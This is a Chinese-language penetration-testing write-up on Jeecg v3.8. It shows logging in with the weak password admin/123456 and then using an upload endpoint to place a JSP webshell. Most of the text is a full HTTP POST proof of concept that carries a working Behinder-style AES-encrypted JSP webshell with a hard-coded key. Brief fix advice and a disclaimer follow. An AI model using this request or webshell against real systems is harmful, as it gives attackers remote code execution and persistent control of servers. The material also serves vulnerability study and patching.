Jeecg弱口令后台上传getShell渗透测试

前言

Jeecg（J2EE Code Generation）是一款基于代码生成器JEE的智能开发平台。引领新的开发模式(Online Coding->代码生成器->手工MERGE智能开发)，可以帮助解决Java项目90%的重复工作，让开发更多关注业务逻辑。既能快速提高开发效率，帮助公司节省人力成本，同时又不失灵活性。

影响版本

jeecg v_3.8

漏洞复现

1.使用弱口令登录系统 admin/123456

2.进入后台后访问url 上传文件（绕过）

/jeecgFormDemoController.do?commonUpload

3.拦截修改文件名后发送，查看响应返回了上传的jsp路径

poc

POST /cgUploadController.do?ajaxSaveFile&sessionId=55F38FB8EA964ABD8CB45203CACB5419 HTTP/1.1
Host: xxxx
Content-Length: 1064
Origin: http://xxxx
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.87 Safari/537.36
Content-Type: multipart/form-data; boundary=----------gL6ae0GI3gL6KM7cH2GI3Ij5Ef1cH2
Accept: */*
X-Requested-With: ShockwaveFlash/34.0.0.164
Referer: http://xxxx/systemController.do?commonUpload&_=1625019692746
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: JEECGINDEXSTYLE=hplus; JSESSIONID=55F38FB8EA964ABD8CB45203CACB5419; ZINDEXNUMBER=2040
Connection: close

------------gL6ae0GI3gL6KM7cH2GI3Ij5Ef1cH2
Content-Disposition: form-data; name="Filename"

bingxie.jsp.jpg
------------gL6ae0GI3gL6KM7cH2GI3Ij5Ef1cH2
Content-Disposition: form-data; name="documentTitle"

blank
------------gL6ae0GI3gL6KM7cH2GI3Ij5Ef1cH2
Content-Disposition: form-data; name="Filedata"; filename="bingxie.jsp"
Content-Type: application/octet-stream

<%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%><%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%><%if (request.getMethod().equals("POST")){String k="e45e329feb5d925b";session.putValue("u",k);Cipher c=Cipher.getInstance("AES");c.init(2,new SecretKeySpec(k.getBytes(),"AES"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);}%>
------------gL6ae0GI3gL6KM7cH2GI3Ij5Ef1cH2
Content-Disposition: form-data; name="Upload"

Submit Query
------------gL6ae0GI3gL6KM7cH2GI3Ij5Ef1cH2--

4.使用冰蝎连接

修复建议

修改弱口令 升级版本 限制上传类型

注意：本文仅供学习参考，非法传播及使用产生的后果自行承担，与本文作者无关

欢迎讨论，持续更新中，感谢关注！